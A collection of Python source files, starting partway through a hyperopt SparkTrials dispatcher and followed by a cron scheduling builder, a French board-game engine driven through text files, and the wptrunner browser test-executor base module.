run_task_thread = inheritable_thread_target(run_task_thread)
task_thread = threading.Thread(target=run_task_thread)
task_thread.setDaemon(True)
task_thread.start()
self._task_threads.add(task_thread)
def _poll_new_tasks(self):
new_task_list = []
for trial in copy.copy(self.trials.trials):
if trial["state"] == base.JOB_STATE_NEW:
# check parallelism limit
if self.running_trial_count() >= self.trials.parallelism:
break
new_task_list.append(trial)
self._begin_trial_run(trial)
return new_task_list
def _cancel_running_trials(self):
if self.trials._spark_supports_job_cancelling:
logger.debug(
"Cancelling all running jobs in job group {g}".format(
g=self._job_group_id
)
)
self.spark.sparkContext.cancelJobGroup(self._job_group_id)
# Make a copy of trials by slicing
for trial in self.trials.trials[:]:
if trial["state"] in [base.JOB_STATE_NEW, base.JOB_STATE_RUNNING]:
trial["state"] = base.JOB_STATE_CANCEL
else:
logger.info(
"Because the current Apache PySpark version does not support "
"cancelling jobs by job group ID, SparkTrials will block until all of "
"its running Spark jobs finish."
)
def wait_for_all_threads(self):
"""
        Wait for the dispatcher and worker threads to finish.
"""
self._fmin_done = True
self._dispatcher_thread.join()
self._dispatcher_thread = None
for task_thread in self._task_threads:
task_thread.join()
self._task_threads.clear()
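
# A rough sketch of how this dispatcher is typically driven (assuming the
# public hyperopt API, which is not part of this file): fmin() is given a
# SparkTrials object, which launches the dispatcher thread, polls for new
# trials and evaluates each one as a single-task Spark job.
#
#     from hyperopt import fmin, tpe, hp, SparkTrials
#
#     def objective(x):
#         return (x - 3) ** 2
#
#     spark_trials = SparkTrials(parallelism=4, timeout=600)
#     best = fmin(fn=objective,
#                 space=hp.uniform("x", -10, 10),
#                 algo=tpe.suggest,
#                 max_evals=50,
#                 trials=spark_trials)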
|
_cronjobs.py
|
from typing import Callable, List, Union
from datetime import datetime, time
from time import sleep
from functools import partial
from re import compile, match, Match, Pattern
from threading import Thread
from croniter import CroniterBadCronError, croniter
class CronBit:
_parent: 'CronBuilder'
_val: Union[List[int], int]
_verb: str
def __init__(self, parent: 'CronBuilder', val: Union[List[int], int], verb: str) -> None:
self._parent = parent
self._val = val
self._verb = verb
@property
def minutes(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.minutes = val
return self._parent
@property
def hours(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.hours = val
return self._parent
@property
def days(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.days = val
return self._parent
@property
def months(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.months = val
return self._parent
@property
def weekdays(self) -> 'CronBuilder':
val: str
if isinstance(self._val, list):
val = ','.join(list(map(str, self._val)))
else:
val = str(self._val)
if self._verb == 'every':
val = '*/' + val
self._parent.weekdays = val
return self._parent
class CronBuilder:
_min: str
_hour: str
_day: str
_month: str
_week: str
def __init__(self) -> None:
self._min = '*'
self._hour = '*'
self._day = '*'
self._month = '*'
self._week = '*'
def every(self, val: Union[List[int], int]) -> CronBit:
return CronBit(self, val, 'every')
def at(self, val: Union[List[int], int]) -> CronBit:
return CronBit(self, val, 'at')
@property
def minutes(self) -> str:
return self._min
@minutes.setter
def minutes(self, val: str) -> None:
self._min = val
@minutes.deleter
def minutes(self) -> None:
self._min = '*'
@property
def hours(self) -> str:
return self._hour
@hours.setter
def hours(self, val: str) -> None:
self._hour = val
@hours.deleter
def hours(self) -> None:
self._hour = '*'
@property
def days(self) -> str:
return self._day
@days.setter
def days(self, val: str) -> None:
self._day = val
@days.deleter
def days(self) -> None:
self._day = '*'
@property
def months(self) -> str:
return self._month
@months.setter
def months(self, val: str) -> None:
self._month = val
@months.deleter
def months(self) -> None:
self._month = '*'
@property
def weekdays(self) -> str:
return self._week
@weekdays.setter
def weekdays(self, val: str) -> None:
self._week = val
@weekdays.deleter
def weekdays(self) -> None:
self._week = '*'
@property
def is_valid(self) -> bool:
try:
_: croniter = self.croniter
return True
except CroniterBadCronError:
return False
def __str__(self) -> str:
return f'{self._min} {self._hour} {self._day} {self._month} {self._week}'
def __add__(self, other: 'CronBuilder') -> 'CronBuilder':
out: 'CronBuilder' = CronBuilder()
out.minutes = self.minutes
out.hours = self.hours
out.days = self.days
out.months = self.months
out.weekdays = self.weekdays
if self.minutes == '*' and other.minutes != '*':
out.minutes = other.minutes
if self.hours == '*' and other.hours != '*':
out.hours = other.hours
if self.days == '*' and other.days != '*':
out.days = other.days
if self.months == '*' and other.months != '*':
out.months = other.months
if self.weekdays == '*' and other.weekdays != '*':
out.weekdays = other.weekdays
return out
def __iadd__(self, other: 'CronBuilder') -> 'CronBuilder':
out: 'CronBuilder' = self + other
self.minutes = out.minutes
self.hours = out.hours
self.days = out.days
self.months = out.months
self.weekdays = out.weekdays
return self
@property
def croniter(self) -> croniter:
return croniter(str(self), datetime.now(), datetime)
@property
def cron(self) -> 'Cron':
return Cron(str(self))
class Cron:
_expr: str
_cron: croniter
def __init__(self, expr: str) -> None:
self._expr = expr
self._cron = croniter(str(self._expr), datetime.now(), datetime)
def wrap(self, func: Callable):
def _inner(cron: croniter, func: Callable):
_next: datetime = cron.get_next(datetime)
while True:
if _next > datetime.now():
sleep(.5)
continue
func()
_next = cron.get_next()
t: Thread = Thread(target=_inner, args=(self._cron, func))
t.daemon = True
t.start()
@staticmethod
def builder() -> CronBuilder:
return CronBuilder()
def wait(func: Union[Callable, None] = None, *, until: str):
if func is None:
p: partial = partial(wait, until=until)
return p
until = until.strip()
_patt: Pattern = compile(r'(\d+):(\d+)')
_match: Union[Match, None] = match(_patt, until)
    if _match is None:
        raise ValueError("'until' must be in HH:MM format, got " + repr(until))
_h: int = int(_match.group(1))
_m: int = int(_match.group(2))
_until: time = time(_h, _m)
def _inner(until_time: time, func: Callable):
while True:
if until_time > datetime.now().time():
sleep(.5)
continue
func()
break
t: Thread = Thread(target=_inner, args=(_until, func))
t.daemon = True
t.start()
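
# Example usage (a minimal sketch, not part of the original module) showing the
# fluent CronBuilder API and the cron expression it produces; every name used
# below is defined earlier in this file.
if __name__ == '__main__':
    builder: CronBuilder = Cron.builder().every(5).minutes.at([9, 17]).hours
    print(str(builder))      # -> "*/5 9,17 * * *"
    print(builder.is_valid)  # -> True, croniter accepts the expression
    # Cron.wrap runs the given callable on a daemon thread, firing on the
    # builder's schedule.
    builder.cron.wrap(lambda: print('tick'))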
|
exo1.py
|
from random import shuffle,randrange
from time import sleep
from threading import Thread
import dummy0, dummy1
latence = 0.001
permanents, deux, avant, apres = {'rose'}, {'rouge','gris','bleu'}, {'violet','marron'}, {'noir','blanc'}
couleurs = avant | permanents | apres | deux
passages = [{1,4},{0,2},{1,3},{2,7},{0,5,8},{4,6},{5,7},{3,6,9},{4,9},{7,8}]
pass_ext = [{1,4},{0,2,5,7},{1,3,6},{2,7},{0,5,8,9},{4,6,1,8},{5,7,2,9},{3,6,9,1},{4,9,5},{7,8,4,6}]
def message(texte,jos):
for j in jos:
f = open("./"+str(j.numero)+"/infos.txt","a")
f.write(texte + "\n")
f.close()
def informer(texte):
message(texte,joueurs)
def demander(q,j):
informer("QUESTION : "+q)
f = open("./"+str(j.numero)+"/questions"+".txt","w")
f.write(q)
f.close()
sleep(latence)
f = open("./"+str(j.numero)+"/reponses"+".txt","r")
r = f.read()
f.close()
informer("REPONSE DONNEE : "+r)
return r
class personnage:
def __init__(self,couleur):
self.couleur, self.suspect, self.position, self.pouvoir = couleur, True, 0, True
def __repr__(self):
susp = "-suspect" if self.suspect else "-clean"
return self.couleur + "-" + str(self.position) + susp
class joueur:
def __init__(self,n):
self.numero = n
self.role = "l'inspecteur" if n == 0 else "le fantome"
def jouer(self,party):
informer("****\n Tour de "+self.role)
p = self.selectionner(party.tuiles_actives)
avec = self.activer_pouvoir(p,party,avant|deux)
self.bouger(p,avec,party.bloque)
self.activer_pouvoir(p,party,apres|deux)
def selectionner(self,t):
w = demander("Tuiles disponibles : " + str(t) + " choisir entre 0 et " + str(len(t)-1),self)
i = int(w) if w.isnumeric() and int(w) in range(len(t)) else 0
p = t[i]
informer("REPONSE INTERPRETEE : "+str(p))
informer(self.role + " joue " + p.couleur)
del t[i]
return p
def activer_pouvoir(self,p,party,activables):
if p.pouvoir and p.couleur in activables:
a = demander("Voulez-vous activer le pouvoir (0/1) ?",self) == "1"
informer("REPONSE INTERPRETEE : "+str(a==1))
if a :
informer("Pouvoir de " + p.couleur + " activé")
p.pouvoir = False
if p.couleur == "rouge":
draw = party.cartes[0]
informer(str(draw) + " a été tiré")
if draw == "fantome":
party.start += -1 if self.numero == 0 else 1
elif self.numero == 0:
draw.suspect = False
del party.cartes[0]
if p.couleur == "noir":
for q in party.personnages:
if q.position in {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque} :
q.position = p.position
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "blanc":
for q in party.personnages:
if q.position == p.position and p != q:
dispo = {x for x in passages[p.position] if x not in party.bloque or q.position not in party.bloque}
w = demander(str(q) + ", positions disponibles : " + str(dispo) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in dispo else dispo.pop()
informer("REPONSE INTERPRETEE : "+str(x))
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "violet":
informer("Rappel des positions :\n" + str(party))
co = demander("Avec quelle couleur échanger (pas violet!) ?",self)
if co not in couleurs:
co = "rose"
informer("REPONSE INTERPRETEE : "+co)
q = [x for x in party.personnages if x.couleur == co][0]
p.position, q.position = q.position, p.position
informer("NOUVEAU PLACEMENT : "+str(p))
informer("NOUVEAU PLACEMENT : "+str(q))
if p.couleur == "marron":
return [q for q in party.personnages if p.position == q.position]
if p.couleur == "gris":
w = demander("Quelle salle obscurcir ? (0-9)",self)
party.shadow = int(w) if w.isnumeric() and int(w) in range(10) else (party.shadow+1)%10
informer("REPONSE INTERPRETEE : "+str(party.shadow))
if p.couleur == "bleu":
w = demander("Quelle salle bloquer ? (0-9)",self)
x = int(w) if w.isnumeric() and int(w) in range(10) else 0
w = demander("Quelle sortie ? Chosir parmi : "+str(passages[x]),self)
y = int(w) if w.isnumeric() and int(w) in passages[x] else passages[x].copy().pop()
informer("REPONSE INTERPRETEE : "+str({x,y}))
party.bloque = {x,y}
return [p]
def bouger(self,p,avec,bloque):
pass_act = pass_ext if p.couleur == 'rose' else passages
if p.couleur != 'violet' or p.pouvoir:
disp = {x for x in pass_act[p.position] if p.position not in bloque or x not in bloque}
w = demander("positions disponibles : " + str(disp) + ", choisir la valeur",self)
x = int(w) if w.isnumeric() and int(w) in disp else disp.pop()
informer("REPONSE INTERPRETEE : "+str(x))
for q in avec:
q.position = x
informer("NOUVEAU PLACEMENT : "+str(q))
class partie:
def __init__(self,joueurs):
for i in [0,1]:
f = open("./"+str(i)+"/infos"+".txt","w")
f.write("")
f.close()
self.joueurs = joueurs
self.start, self.end, self.num_tour, self.shadow, x = 4, 22, 1, randrange(10), randrange(10)
self.bloque = {x,passages[x].copy().pop()}
self.personnages = {personnage(c) for c in couleurs}
self.tuiles = [p for p in self.personnages]
self.cartes = self.tuiles[:]
self.fantome = self.cartes[randrange(8)]
message("!!! Le fantôme est : "+self.fantome.couleur,[self.joueurs[0]])
self.cartes.remove(self.fantome)
self.cartes += ['fantome']*3
shuffle(self.tuiles)
shuffle(self.cartes)
for i,p in enumerate(self.tuiles):
p.position = i
def actions(self):
joueur_actif = self.num_tour % 2
if joueur_actif == 1:
shuffle(self.tuiles)
self.tuiles_actives = self.tuiles[:4]
else:
self.tuiles_actives = self.tuiles[4:]
for i in [joueur_actif,1-joueur_actif,1-joueur_actif,joueur_actif]:
self.joueurs[i].jouer(self)
def lumiere(self):
partition = [{p for p in self.personnages if p.position == i} for i in range(10)]
if len(partition[self.fantome.position]) == 1 or self.fantome.position == self.shadow:
informer("le fantome frappe")
self.start += 1
for piece,gens in enumerate(partition):
if len(gens) > 1 and piece != self.shadow:
for p in gens:
p.suspect = False
else:
informer("pas de cri")
for piece,gens in enumerate(partition):
if len(gens) == 1 or piece == self.shadow:
for p in gens:
p.suspect = False
self.start += len([p for p in self.personnages if p.suspect])
def tour(self):
informer("**************************\n" + str(self))
self.actions()
self.lumiere()
for p in self.personnages:
p.pouvoir = True
self.num_tour += 1
def lancer(self):
while self.start < self.end and len([p for p in self.personnages if p.suspect]) > 1:
self.tour()
informer("L'enquêteur a trouvé - c'était " + str(self.fantome) if self.start < self.end else "Le fantôme a gagné")
informer("Score final : "+str(self.end-self.start))
return self.end-self.start
def __repr__(self):
return "Tour:" + str(self.num_tour) + ", Score:"+str(self.start)+"/"+str(self.end) + ", Ombre:" + str(self.shadow) + ", Bloque:" + str(self.bloque) +"\n" + " ".join([str(p) for p in self.personnages])
score = []
joueurs = [joueur(0),joueur(1)]
nbparties = 20
for i in range(nbparties):
t1,t2 = Thread(target=dummy0.lancer), Thread(target=dummy1.lancer)
t1.start()
t2.start()
score.append(partie(joueurs).lancer())
t1.join()
t2.join()
victoires = [x for x in score if x<=0]
print("Efficacité : "+str(len(victoires)/nbparties*100)+"%")
|
base.py
|
import base64
import hashlib
from six.moves.http_client import HTTPConnection
import io
import json
import os
import threading
import traceback
import socket
import sys
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from .protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshot(data):
"""Computes the sha1 checksum of a base64-encoded screenshot."""
return hashlib.sha1(base64.b64decode(data)).hexdigest()
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshot(item["screenshot"])
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
        # Add twice the extra timeout since the called function is expected to
        # wait at least self.timeout + self.extra_timeout and this gives some leeway
finished = self.result_flag.wait(self.timeout + 2 * self.extra_timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive:
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
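
# A minimal sketch (not part of wptrunner) of how TimedRunner is meant to be
# subclassed: concrete runners override set_timeout and run_func, perform the
# real work in run_func on the executor thread, store a (success, data) tuple
# in self.result and set self.result_flag so that run() above can return.
#
#     class ExampleRunner(TimedRunner):
#         def set_timeout(self):
#             pass  # a real runner would configure the protocol timeout here
#
#         def run_func(self):
#             try:
#                 self.result = True, self.func(self.protocol, self.url, self.timeout)
#             except Exception as e:
#                 self.result = False, ("INTERNAL-ERROR", str(e))
#             finally:
#                 self.result_flag.set()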
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc(e))
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hash_screenshot(data)
self.screenshot_cache[key] = (hash_value, screenshot)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def is_pass(self, hashes, screenshots, urls, relation, fuzzy):
assert relation in ("==", "!=")
if not fuzzy or fuzzy == ((0,0), (0,0)):
equal = hashes[0] == hashes[1]
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match, checking pixel differences")
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
return equal if relation == "==" else not equal
def get_differences(self, screenshots, urls):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s" %
(count, per_channel))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
        # of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
if self.is_pass(hashes, screenshots, urls, relation, fuzzy):
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url, "screenshot": screenshots[0], "hash": hashes[0]},
relation,
{"url": nodes[1].url, "screenshot": screenshots[1], "hash": hashes[1]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol),
"action_sequence": ActionSequenceAction(self.logger, self.protocol),
"generate_test_report": GenerateTestReportAction(self.logger, self.protocol),
"set_permission": SetPermissionAction(self.logger, self.protocol),
"add_virtual_authenticator": AddVirtualAuthenticatorAction(self.logger, self.protocol),
"remove_virtual_authenticator": RemoveVirtualAuthenticatorAction(self.logger, self.protocol),
"add_credential": AddCredentialAction(self.logger, self.protocol),
"get_credentials": GetCredentialsAction(self.logger, self.protocol),
"remove_credential": RemoveCredentialAction(self.logger, self.protocol),
"remove_all_credentials": RemoveAllCredentialsAction(self.logger, self.protocol),
"set_user_verified": SetUserVerifiedAction(self.logger, self.protocol),
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
